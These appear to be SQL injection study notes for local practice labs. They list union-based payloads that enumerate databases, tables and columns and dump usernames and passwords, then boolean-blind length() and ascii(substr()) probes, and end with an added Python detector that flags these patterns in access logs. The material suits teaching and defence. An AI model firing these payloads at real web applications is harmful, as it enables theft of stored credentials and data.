http://localhost/index.php?uid=88' union select 1,schema_name,3 from information_schema.schemata--+
----- Query all database names
http://localhost/index.php?uid=88 union select 1,table_name,3 from information_schema.tables where table_schema="zrb"--+
----- Query the table names in the zrb database
http://localhost/index.php?uid=88 union select 1,column_name,3 from information_schema.columns where table_schema="zrb" and table_name="dt_users"--
----- Query the column names of the dt_users table in the zrb database
http://localhost/index.php?uid=88 union select last_login_ip,username,password from dt_users--+
----- With the database, table and column names known, query the actual data directly
http://localhost/sqli/Less-1/?id=pijkk' union select 1,schema_name,3 from information_schema.schemata limit 3,1--
--- Get the length of the database name
and length(database())>10--+
database() returns the current database name; length() returns the length of a string
security -- the database name
--- Match the database name character by character using ASCII codes
ascii(substr(database(),1,1))=87
--- Match the database name character by character directly
' and substr(database(),1,1)='s'--+
ascii() converts a character to its ASCII code; substr() cuts out a substring and takes two further parameters: the first is the position to start from, the second is the number of characters to take
---- Table name length
' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6--+
---- Iterate over the table name by ASCII code -- email
' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),4,1))=105--+
---- Column name length
' and substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1)>100
---- Iterate over the column name by ASCII code -- id
' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),4,1))=105--+
Suppose there are two columns, username and password, and we want to retrieve the data in them
' and substr((select username,password from emails limit 0,1),1,1)>100
' and ascii(substr((select username,password from emails limit 0,1),1,1))=105--+
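The defender's view of the requests above: an added example (not part of these notes) that flags the union-based information_schema enumeration and the boolean-blind length()/ascii(substr()) probes in web access log lines. The log lines, client IPs and label names are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# One regex per enumeration step shown in the notes above; each is applied to
# the URL-decoded, lower-cased, whitespace-collapsed query string.
PATTERNS = {
    "union-schema-enum": re.compile(
        r"union\s+(all\s+)?select\b.*\binformation_schema\.(schemata|tables|columns)\b"),
    "union-select": re.compile(r"union\s+(all\s+)?select\b"),
    "blind-length": re.compile(r"\blength\s*\(.*\)\s*[=<>]\s*\d+"),
    "blind-char-compare": re.compile(r"\b(ascii\s*\(\s*)?substr(ing)?\s*\(.*\)\s*[=<>]"),
}
COMMENT_TAIL = re.compile(r"(--|#)\s*\+?\s*$")   # the trailing "--+" / "-- " terminator

def normalise(url: str) -> str:
    """Decode %XX and '+', fold smart quotes to ASCII, collapse whitespace, lower-case."""
    decoded = unquote_plus(urlsplit(url).query)
    decoded = decoded.replace("\u2019", "'").replace("\u2018", "'")
    return re.sub(r"\s+", " ", decoded).lower()

def classify(url: str) -> list:
    """Return the technique labels that fire for one request URL ([] if none)."""
    q = normalise(url)
    hits = [name for name, rx in PATTERNS.items() if rx.search(q)]
    if "union-schema-enum" in hits:
        hits.remove("union-select")          # the specific label implies the generic one
    if hits and COMMENT_TAIL.search(q):
        hits.append("comment-terminator")
    return hits

def scan_log(lines) -> list:
    """Return (client_ip, url, labels) for every combined-format access log line that fires."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 7:                   # not a well-formed 'ip - - [ts] "METHOD url ...' line
            continue
        labels = classify(parts[6])
        if labels:
            findings.append((parts[0], parts[6], labels))
    return findings

# Constructed sample log lines (not real traffic) mirroring the requests in the notes.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?uid=88 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?uid=88%27+union+select+1,schema_name,3'
    '+from+information_schema.schemata--+ HTTP/1.1" 200 734',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-1/?id=1%27+and+length(database())%3E10--+ HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-1/?id=1%27+and+ascii(substr(database(),1,1))=115--+ HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for ip, url, labels in scan_log(SAMPLE_LOG):
        print(ip, labels, url)
```

Note that unquote_plus turns the trailing "+" of "--+" into a space, which is exactly what the database saw, so the comment-terminator check matches the decoded form rather than the raw URL.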